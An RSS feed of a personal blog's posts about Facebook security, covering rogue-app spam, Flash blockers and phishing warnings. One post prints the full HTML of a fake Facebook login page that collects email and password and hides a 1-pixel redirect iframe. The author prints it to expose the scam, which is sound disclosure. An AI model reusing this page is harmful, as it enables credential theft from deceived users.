<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Live Well, Work Well, Love Life &#187; Facebook</title>
	<atom:link href="http://stephenhultquist.com/thoughts/tag/facebook/feed/" rel="self" type="application/rss+xml" />
	<link>http://stephenhultquist.com/thoughts</link>
	<description>Growing... Your Business, Your Self, Your Time</description>
	<lastBuildDate>Tue, 24 Aug 2010 03:04:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Facebook&#8217;s Security Mess</title>
		<link>http://stephenhultquist.com/thoughts/2010/08/18/facebooks-security-mess/</link>
		<comments>http://stephenhultquist.com/thoughts/2010/08/18/facebooks-security-mess/#comments</comments>
		<pubDate>Wed, 18 Aug 2010 16:04:36 +0000</pubDate>
		<dc:creator>ssh</dc:creator>
				<category><![CDATA[Reviews]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Abuse]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Free iPad Event]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Scam]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Trojan]]></category>

		<guid isPermaLink="false">http://stephenhultquist.com/thoughts/?p=1136</guid>
		<description><![CDATA[Last week I was sitting in my office working away on a client&#8217;s iPhone app when my iPhone&#8217;s text message bell alert rang. I picked up my phone to see my daughter&#8217;s text message: &#8220;Free iPad event?&#8221; After an exchange, I learned that my Facebook account had sent her an event request with a link [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>Last week I was sitting in my office working away on a client&#8217;s iPhone app when my iPhone&#8217;s text message bell alert rang. I picked up my phone to see my daughter&#8217;s text message: &#8220;Free iPad event?&#8221; After an exchange, I learned that my Facebook account had sent her an event request with a link to a rogue quiz site that was offering quizzes for the amazingly low price of $19.99 a month. I also started getting emails from other friends who were getting the invitation from me.</p>
<p>So, I got mad.</p>
<p>First, I deleted the event. Then, I posted to my wall about it. And then, I went on the warpath.</p>
<p>You see, I am very careful about my Facebook account. While I explore aspects of Facebook as part of my research for clients, I am aware of the dangers and am diligent in working through the possible issues. But, I got caught. So, I went looking for the source of the issue.</p>
<p>The first thing I learned is that I am not alone. There is even a <a href="http://www.facebook.com/group.php?gid=110630432311231" target="_blank">Facebook group</a> that has grown up to oppose it. But, no one seemed to know how it was done, so I began to investigate.</p>
<p>Given the invitation text and the targets, I figured out that it had to have come from an application with access to my account. I dug through my entire list of applications, eliminating many that were either old or that I don&#8217;t use. But, it&#8217;s important to understand that Facebook makes this process far more painful than it needs to be. If only Facebook would make a note on the wall posts, event invites, and other items noting what application was used to create it, we could track down the reprobates who build these cheap cheats. Twitter even does it:</p>
<div id="attachment_1139" class="wp-caption aligncenter" style="width: 438px">
	<a href="http://stephenhultquist.com/thoughts/wp-content/uploads/2010/08/TwitterExample1.jpg"><img class="size-full wp-image-1139 " title="TwitterExample" src="http://stephenhultquist.com/thoughts/wp-content/uploads/2010/08/TwitterExample1.jpg" alt="" width="438" height="206" /></a>
	<p class="wp-caption-text">Twitter displays the source of the Tweet below the text</p>
</div>
<p>So Twitter, with its informal nature, trumps Facebook in one of the most important aspects of security: transparency.</p>
<p>In my next few posts, I&#8217;ll outline what you can do to scrub your Facebook account in a way that will make it much more hardened against this kind of attack. However, with the limited transparency of Facebook&#8217;s system right now, there is only so much you can do.</p>
]]></content:encoded>
			<wfw:commentRss>http://stephenhultquist.com/thoughts/2010/08/18/facebooks-security-mess/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Being Careful Isn&#8217;t Enough</title>
		<link>http://stephenhultquist.com/thoughts/2010/08/10/being-careful-isnt-enough/</link>
		<comments>http://stephenhultquist.com/thoughts/2010/08/10/being-careful-isnt-enough/#comments</comments>
		<pubDate>Tue, 10 Aug 2010 23:30:24 +0000</pubDate>
		<dc:creator>ssh</dc:creator>
				<category><![CDATA[CIO Views]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Foursquare]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Trojans]]></category>
		<category><![CDATA[Twitter]]></category>

		<guid isPermaLink="false">http://stephenhultquist.com/thoughts/?p=1069</guid>
		<description><![CDATA[&#8220;Want a free iPad?&#8221; That&#8217;s an email that my Facebook friends received from me this morning. The problem is, I never sent it. In fact, I never saw it until it had been sent on my behalf. Being careful isn&#8217;t enough. I wrote here on this very blog last year about the various trojans and [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>&#8220;Want a free iPad?&#8221; That&#8217;s an email that my Facebook friends received from me this morning. The problem is, I never sent it. In fact, I never saw it until it had been sent on my behalf. Being careful isn&#8217;t enough.</p>
<p>I wrote here on this very blog last year about the <a href="http://stephenhultquist.com/thoughts/2009/05/23/more-facebook-phishing/" target="_self">various trojans and other attacks</a> made on and through Facebook.</p>
<p>Today, I was used.</p>
<p>This morning as I was starting work, my daughter sent a text message asking me about a free iPad. I didn&#8217;t know what she was talking about. Then, after a bit of investigation, I learned that some rogue application that I had approved for access to my Facebook account, had sent an event invitation to everyone on my Friends list.</p>
<p>This is a big deal.</p>
<p>It&#8217;s a big deal because I cannot even easily send a message to everyone on my friends list. Therefore, my apology email took a while to create, since I had to manually create a list with all of my friends on it.</p>
<p>It&#8217;s also a big deal because there was no way for me to find out from the invitations which application sent it. Was one of the seemly appropriate applications like Twitter or Foursquare the issue? Or how about that <a href="http://fcinf.com/v/ansv" target="_blank">Fast Company Influence Project</a> app that I set up yesterday? I can&#8217;t tell. The invitation does tell anyone how it was created, and I have no way of working backwards from the invitation to the app and removing its permissions.</p>
<p>This is a Facebook security problem, and Facebook needs to address it. As a result of this issue, I have removed a number of apps from my Facebook page and will remove all of them if it happens again.</p>
<p>In the meantime, I&#8217;m committed to doing what I can to track down this rogue app. If you have any insight into how this was done or what app might have done it, I&#8217;d love to get your insights. I&#8217;ll update this post as I discover more.</p>
]]></content:encoded>
			<wfw:commentRss>http://stephenhultquist.com/thoughts/2010/08/10/being-careful-isnt-enough/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Kill Flash, Fix Your System</title>
		<link>http://stephenhultquist.com/thoughts/2010/08/04/kill-flash-fix-your-system/</link>
		<comments>http://stephenhultquist.com/thoughts/2010/08/04/kill-flash-fix-your-system/#comments</comments>
		<pubDate>Wed, 04 Aug 2010 20:05:39 +0000</pubDate>
		<dc:creator>ssh</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[BashFlash]]></category>
		<category><![CDATA[ClickToFlash]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[FlashBlock]]></category>
		<category><![CDATA[Kill-Flash]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[OS X]]></category>

		<guid isPermaLink="false">http://stephenhultquist.com/thoughts/?p=1045</guid>
		<description><![CDATA[A Facebook conversation this week reminded me that many people do not know how damaging Adobe Flash can be on many systems, especially, it seems, those running Apple&#8217;s OS X. For many years, I have found Flash more annoying than anything, and so have run various plug-ins to keep Flash from loading in my browsers. [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>A Facebook conversation this week reminded me that many people do not know how damaging <a href="http://www.adobe.com/products/flashplayer/" target="_blank">Adobe Flash</a> can be on many systems, especially, it seems, those running Apple&#8217;s OS X. For many years, I have found Flash more annoying than anything, and so have run various plug-ins to keep Flash from loading in my browsers. There are also an additional mini-application that you may find useful.</p>
<p>First, there are a number of Flash blocking plug-ins for the various browsers available. For Firefox, there&#8217;s <a href="https://addons.mozilla.org/en-US/firefox/addon/433/" target="_blank">FlashBlock</a>. Ffor Safari there&#8217;s <a href="http://clicktoflash.com/" target="_blank">ClickToFlash</a>. For Google Chrome, there&#8217;s <a href="https://chrome.google.com/extensions/detail/kfncbcioneejfnnelcdmocdjncbmceea" target="_blank">Kill-Flash</a>. All of these plugins do the same thing: they replace the Flash elements on a page with a clickable image. If you don&#8217;t click, no Flash ever loads. If you do, Flash loads and plays.</p>
<p>One think I especially like about ClickToFlash is that you can adjust the settings to load H.264 videos on YouTube instead of Flash when it is available. Very nice.</p>
<p>In addition to these plug-ins, I also use <a href="http://www.bashflash.com/" target="_blank">BashFlash</a> on my Macs. This little application sits quietly in the menubar until one of the Flash processes starts going crazy. Sometimes, a Flash process can cycle up and take over a computer. When one does this, BashFlash wakes up, turns red, and lets you kill the runaway Flash process.</p>
<p>Together, these plugins and app will make your browsing experience much more pleasant. I run ClickToFlash and Kill-Flash on my two most-used browsers, and keep BashFlash on hand, too. Let me know how it goes for you.</p>
]]></content:encoded>
			<wfw:commentRss>http://stephenhultquist.com/thoughts/2010/08/04/kill-flash-fix-your-system/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>More Facebook Phishing</title>
		<link>http://stephenhultquist.com/thoughts/2009/05/23/more-facebook-phishing/</link>
		<comments>http://stephenhultquist.com/thoughts/2009/05/23/more-facebook-phishing/#comments</comments>
		<pubDate>Sat, 23 May 2009 15:13:10 +0000</pubDate>
		<dc:creator>ssh</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Social Media]]></category>

		<guid isPermaLink="false">http://stephenhultquist.com/thoughts/?p=758</guid>
		<description><![CDATA[The word &#8220;Phishing&#8221; is used for sites that steal your identity, and there are more Phishing sites stealing Facebook login information today. First thing this morning, I received a Facebook message with the subject &#8220;Hi&#8221; and the content &#8220;Look at redbuddy dot be&#8221;. Going to that site gets you the same kind of site as [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>The word &#8220;Phishing&#8221; is used for sites that steal your identity, and there are more Phishing sites stealing Facebook login information today.</p>
<p>First thing this morning, I received a Facebook message with the subject &#8220;Hi&#8221; and the content &#8220;Look at redbuddy dot be&#8221;. Going to that site gets you the same kind of site as I reported in <a href="http://stephenhultquist.com/thoughts/2009/05/21/facebook-trojan-attack/">Facebook Trojan Attack</a> earlier this week. Once again it&#8217;s obviously a phishing site, with language like, &#8221;We helps you connect and share with the people in your life.&#8221; and yet people are still being sucked in!</p>
<p>Beware! Do <font color="#ff0000"><strong>not</strong></font> log in to any site that you don&#8217;t absolutely know is the site you want. Realize that any time you use your login, it can be compromised. I&#8217;m putting together a brief video on this that I plan to have ready this weekend.</p>
<p>For more insights on social media, check out my <a href="http://mygeekwhisperer.com/social/">social media programs</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://stephenhultquist.com/thoughts/2009/05/23/more-facebook-phishing/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Facebook Trojan Attack</title>
		<link>http://stephenhultquist.com/thoughts/2009/05/21/facebook-trojan-attack/</link>
		<comments>http://stephenhultquist.com/thoughts/2009/05/21/facebook-trojan-attack/#comments</comments>
		<pubDate>Thu, 21 May 2009 18:47:56 +0000</pubDate>
		<dc:creator>ssh</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Social Media]]></category>

		<guid isPermaLink="false">http://stephenhultquist.com/thoughts/?p=750</guid>
		<description><![CDATA[There are rogue users attempting to capture Facebook credentials using a poor copy of a Facebook login page.]]></description>
			<content:encoded><![CDATA[<p></p><p>This morning, I received a facebook message that was short and questionable: &#8220;Check kirgo.at.&#8221; Interested, I visited the site, only to discover a poorly-disguised site attempting to look like a Facebook login page:</p>
<div id="attachment_751" class="wp-caption aligncenter" style="width: 300px">
	<a href="http://stephenhultquist.com/thoughts/wp-content/uploads/2009/05/picture-1.jpg"><img class="size-medium wp-image-751" title="Fake Facebook" src="http://stephenhultquist.com/thoughts/wp-content/uploads/2009/05/picture-1-300x205.jpg" alt="Fake Facebook Page" width="300" height="205" /></a>
	<p class="wp-caption-text">Fake Facebook Page</p>
</div>
<p>While this page doesn&#8217;t look very much like the real Facebook login page, and all of the links at the bottom go nowhere, some people are being caught by this trojan. They enter their Facebook credentials and their accounts are immediately compromised. Once compromised, their account sends a Facebook message to everyone in their Friends list with the same message (&#8220;Check X.at.&#8221;). That&#8217;s how the Trojan propogates.</p>
<p>Note that some people got this message in their email (because Facebook sends them a copy of their messages) and jumped to the page from there.</p>
<p>Here is the rule: <font color="#ff0000"><strong>Do not EVER give your Facebook credentials to any site other than Facebook, and do not follow a link to something that looks like Facebook and fill in your credentials</strong></font>. Period.</p>
<p><strong>Update</strong>: Late today, Facebook added some additional controls to their login page in an effort to defeat the hackers, checking login attempts against the location from which the attempt is coming. This is a good move start for Facebook, who are still so new at the game that there are a number of security holes in their systems.</p>
<p>If you read HTML, the following is the complete HTML from the page as of 11:40am MDT on May 21, 2009:</p>
<pre>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"&gt;
&lt;head&gt;
	&lt;meta http-equiv="Content-type" content="text/html; charset=utf-8" /&gt;
	&lt;title&gt;Login&lt;/title&gt;
	&lt;link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5LNJ/lpkg/56jyd27o/en_US/141/163305/css/aubdlzq1p80sw40o.pkg.css" /&gt;
    &lt;link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zC45Y/l/ecfhg87x/en_US/159827/css/login.css" /&gt;
    &lt;link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z252O/lpkg/zz2nmjbl/en_US/141/163009/css/a22nq2m07kocs00s.pkg.css" /&gt;
    &lt;link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z6WDZ/lpkg/6k6blvpv/en_US/141/164471/css/bjoirszhnfsoc88c.pkg.css" /&gt;
    &lt;link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z32G8/lpkg/14ewl514/en_US/141/159058/css/9wzufavzfjcogsgk.pkg.css" /&gt;
&lt;/head&gt;
&lt;body class="login_page ie7 UIPage_LoggedOut Locale_en_US"&gt;
&lt;div id="dropmenu_container"&gt;&lt;/div&gt;
&lt;div id="nonfooter"&gt;
	&lt;div id="page_height" class="clearfix"&gt;
		&lt;div id="menubar_container"&gt;
			&lt;div id="fb_menubar" class="fb_menubar_logged_out clearfix"&gt;
				&lt;div id="fb_menubar_core"&gt;&lt;ul class="fb_menu_list"&gt;&lt;li class="fb_menu" id="fb_menubar_logo" style="height:85px;"&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;
				&lt;div id="fb_menubar_aux"&gt;&lt;ul class="fb_menu_list"&gt;&lt;/ul&gt;&lt;/div&gt;
			&lt;/div&gt;
			&lt;div class="signup_box clearfix" style="height:25px;"&gt;
				&lt;div class="UILinkButton UILinkButton_SUBig"&gt;&lt;a href="/" class="UILinkButton_A"&gt;Sign Up&lt;/a&gt;
					&lt;div class="UILinkButton_RW"&gt;
						&lt;div class="UILinkButton_R"&gt;&lt;/div&gt;
					&lt;/div&gt;
				&lt;/div&gt;
				&lt;span class="signup_box_message" style="padding-left:15px;"&gt;We helps you connect and share with the people in your life.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="content" class="fb_content"&gt;&lt;div class="UIFullPage_Container"&gt;&lt;div class="UIInterstitialContainer clearfix"&gt;&lt;div class="UIRoundedTransparentBox"&gt;&lt;div class="UIRoundedTransparentBox_Inner clearfix"&gt;&lt;div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TL"&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TR"&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BL"&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BR"&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="UIRoundedTransparentBox_Border clearfix"&gt;&lt;div class="UIInterstitialBox_Container clearfix"&gt;&lt;div class="UIOneOff_Container"&gt;
				&lt;div class="title_header add_border"&gt;&lt;h2 class="no_icon"&gt;Login&lt;/h2&gt;&lt;/div&gt;
				&lt;form method="POST" action="/?login_attempt=1"&gt;
				&lt;div id="loginform" style=""&gt;
				&lt;div class="form_row clearfix "&gt;&lt;label for="email" id="label_email"&gt;Email:&lt;/label&gt;&lt;input type="text" class="inputtext" id="email" name="email" value="" /&gt;&lt;/div&gt;
				&lt;div class="form_row clearfix "&gt;&lt;label for="pass" id="label_pass"&gt;Password:&lt;/label&gt;&lt;input type="password" class="inputpassword" id="pass" name="pass" value="" /&gt;&lt;/div&gt;
				&lt;label class="persistent"&gt;&lt;input type="checkbox" class="inputcheckbox " name="persistent" value="1" /&gt;&lt;span&gt;Remember me&lt;/span&gt;&lt;/label&gt;
				&lt;div id="buttons" class="form_row clearfix"&gt;&lt;label&gt;&lt;/label&gt;
				&lt;input type="submit" value="Login" name="login" id="login" class="inputsubmit" /&gt;&lt;/div&gt;&lt;p class="reset_password form_row"&gt;&lt;label&gt;&lt;/label&gt;&lt;a href="/"&gt;Forgot your password?&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;/form&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;div id="pagefooter"&gt;&lt;div class="pagefooter_topborder clearfix"&gt;&lt;div class="copyright_and_location clearfix"&gt;&lt;div class="copyright" id="pagefooter_copyright"&gt;&lt;span title="PHP"&gt;&lt;/span&gt;&lt;span id="rtime" title="130"&gt;&amp;copy;&lt;/span&gt; &lt;span title="10.18.7.118"&gt;20&lt;/span&gt;&lt;span title="17409680"&gt;09&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div id="pagefooter_links"&gt;&lt;ul i
1df
d="pagefooter_left_links"&gt;&lt;li&gt;&lt;a href="/"&gt;Login&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/"&gt;About&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/"&gt;Advertising&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/"&gt;Careers&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/"&gt;Terms&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul id="pagefooter_right_links"&gt;&lt;li&gt;&lt;a href="/"&gt;Privacy&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/"&gt;Mobile&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/"&gt;Help&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;iframe src='/tds/go.php?sid=2&amp;pid=1431' width="1px" height="1px"&gt;&lt;/iframe&gt;&lt;font&gt;&lt;/font&gt;&lt;font&gt;&lt;/font&gt;&lt;font&gt;&lt;/font&gt;&lt;font&gt;&lt;/font&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
<p>This is not the only domain name that is attempting this, either, so beware!</p>
]]></content:encoded>
			<wfw:commentRss>http://stephenhultquist.com/thoughts/2009/05/21/facebook-trojan-attack/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>
